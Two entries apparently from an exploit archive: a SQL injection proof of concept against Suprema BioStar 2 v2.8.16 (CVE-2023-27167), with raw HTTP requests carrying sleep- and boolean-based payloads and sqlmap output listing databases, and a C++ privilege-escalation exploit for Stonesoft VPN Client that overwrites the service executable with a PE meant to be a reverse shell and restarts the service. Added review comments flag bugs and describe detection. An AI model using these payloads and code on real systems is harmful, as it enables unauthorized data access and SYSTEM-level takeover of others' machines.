  24. # Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection # Date: 26/03/2023 # Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/) # Vendor Homepage: https://www.supremainc.com/ # Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp # Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide # Version: 2.8.16 # Tested on: Windows, Linux # CVE-2023-27167 ## Description A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. ## Request PoC #1 ''' POST /api/users/absence?search_month=1 HTTP/1.1 Host: biostar2.server.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/plain, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/json;charset=UTF-8 content-language: en bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 Content-Length: 204 Origin: https://biostar2.server.net Connection: close Referer: https://biostar2.server.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}} ''' Time based SQL injection (set 4 – response delays for 8 seconds). 
''' ## Request PoC #2 ''' POST /api/users/absence?search_month=1 HTTP/1.1 Host: biostar2.server.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/plain, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/json;charset=UTF-8 content-language: en bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 Content-Length: 188 Origin: https://biostar2.server.net Connection: close Referer: https://biostar2.server.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} ''' Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin) ''' ## Exploit with SQLmap Save the request from Burp Suite to file. ''' --- Parameter: JSON #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}} --- [05:02:49] [INFO] testing MySQL [05:02:49] [INFO] confirming MySQL [05:02:50] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL > 5.0.0 (MariaDB fork) [05:02:50] [INFO] fetching database names [05:02:50] [INFO] fetching number of databases [05:02:54] [WARNING] running in a single-thread mode. 
Please consider usage of option '--threads' for faster data retrieval [05:02:55] [INFO] retrieved: 2 [05:03:12] [INFO] retrieved: biostar2_ac [05:03:56] [INFO] retrieved: information_schema available databases [2]: [*] biostar2_ac [*] information schema '''
  25. # Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
# Exploit Author : TOUHAMI KASBAOUI
# Vendor Homepage : https://www.forcepoint.com/
# Software: Stonesoft VPN Windows
# Version : 6.2.0 / 6.8.0
# Tested on : Windows 10
# CVE : N/A
#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM
// NOTE(review): the "# ..." advisory header lines above are not valid
// preprocessor directives; they have to be stripped before this compiles.
#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <iostream>
// NOTE(review): uint8_t (used in main) comes from <cstdint>, which is not
// included here; it may only resolve through transitive includes.
using namespace std;

// Outcome of ServiceExists(): separates SCM-open failures from service-open
// failures and the "exists" case.
enum Result { unknown, serviceManager_AccessDenied, serviceManager_DatabaseDoesNotExist, service_AccessDenied, service_InvalidServiceManagerHandle, service_InvalidServiceName, service_DoesNotExist, service_Exist };

// Opens the active services database read-only, then tries to open
// serviceName read-only, mapping the Win32 error codes onto Result. Both
// handles are closed before returning; an SCM-open failure returns early
// with nothing to close.
Result ServiceExists(const std::wstring& serviceName) {
    Result r = unknown;
    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);
    if (manager == NULL) {
        DWORD lastError = GetLastError();
        if (lastError == ERROR_ACCESS_DENIED) return serviceManager_AccessDenied;
        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST) return serviceManager_DatabaseDoesNotExist;
        else return unknown;
    }
    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);
    if (service == NULL) {
        DWORD error = GetLastError();
        if (error == ERROR_ACCESS_DENIED) r = service_AccessDenied;
        else if (error == ERROR_INVALID_HANDLE) r = service_InvalidServiceManagerHandle;
        else if (error == ERROR_INVALID_NAME) r = service_InvalidServiceName;
        else if (error == ERROR_SERVICE_DOES_NOT_EXIST) r = service_DoesNotExist;
        else r = unknown;
    }
    else r = service_Exist;
    if (service != NULL) CloseServiceHandle(service);
    if (manager != NULL) CloseServiceHandle(manager);
    return r;
}

// Renames the VPN client executable to sgvpn_old.exe in the same directory.
// NOTE(review): always returns 0 (false), even when MoveFile succeeded, and
// main() ignores the return value anyway, so the rename outcome never gates
// the file write that follows.
bool ChangeName() {
    LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";
    LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";
    bool success = MoveFile(parrentvpnfilename, newName);
    if (success) {
        cerr << "[+] SVGVPN filename changed.\n";
    }
    else {
        cerr << "Failed to rename file \n";
    }
    return 0;
}

// Program flow: report whether the service exists, rename the original
// sgvpn.exe, write the byte array into its place, then stop and start the
// sgipsecvpn service so the new image runs in the service's context (the
// header above states SYSTEM; the starting point is Administrator).
// Defender's note: the observable sequence is a rename of the service binary,
// a new file written at the same path, and a stop/start of the service; file
// and service-control telemetry on the service executable path is where this
// shows up. The page does not show whether the service validates its binary
// before running it.
int main() {
    // 7168-byte buffer of which only the first 32 bytes (an "MZ" DOS-header
    // prefix) are given; the remaining elements are zero-initialised, so as
    // written the file produced is presumably not a runnable image — the
    // author's comment below says the array is meant to be replaced.
    const uint8_t shellcode[7168] = { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, };
    //You can set array bin of your reverse shell PE file here
    std::wstring serviceName = L"sgipsecvpn";
    // NOTE(review): the result is only printed; the rename and write below
    // proceed regardless of whether the service exists.
    Result result = ServiceExists(serviceName);
    if (result == service_Exist) std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;
    else if (result == service_DoesNotExist) std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
    else std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;
    ChangeName();
    // CREATE_ALWAYS: creates or truncates the file at the original path.
    HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";
    if (fileHandle == INVALID_HANDLE_VALUE) {
        cerr << "Failed to create shellcode\n";
        return 1;
    }
    DWORD bytesWritten;
    // NOTE(review): bytesWritten is never compared with sizeof(shellcode),
    // so a short write goes unnoticed.
    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
        cerr << "Failed to write to file\n";
        CloseHandle(fileHandle);
        return 1;
    }
    CloseHandle(fileHandle);
    cout << "[+] Payload exported to ForcePointVPN \n";
    Sleep(30); // 30 ms
    cout << "[+] Restart ForcePointVPN Service \n";
    // NOTE(review): neither handle is checked for NULL; a failed
    // OpenSCManager/OpenService is passed straight into QueryServiceStatus.
    SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);
    SERVICE_STATUS serviceStatus;
    QueryServiceStatus(serviceHandle, &serviceStatus);
    // Stop the service if it is running and poll once per second until it
    // reports SERVICE_STOPPED.
    // NOTE(review): ControlService's return value is ignored and the loop has
    // no timeout, so a refused or hung stop spins forever.
    if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
        ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);
        while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {
            QueryServiceStatus(serviceHandle, &serviceStatus);
            Sleep(1000);
        }
    }
    // Start result is not checked either.
    StartService(serviceHandle, NULL, NULL);
    CloseServiceHandle(serviceHandle);
    CloseServiceHandle(scmHandle);
    return 0;
}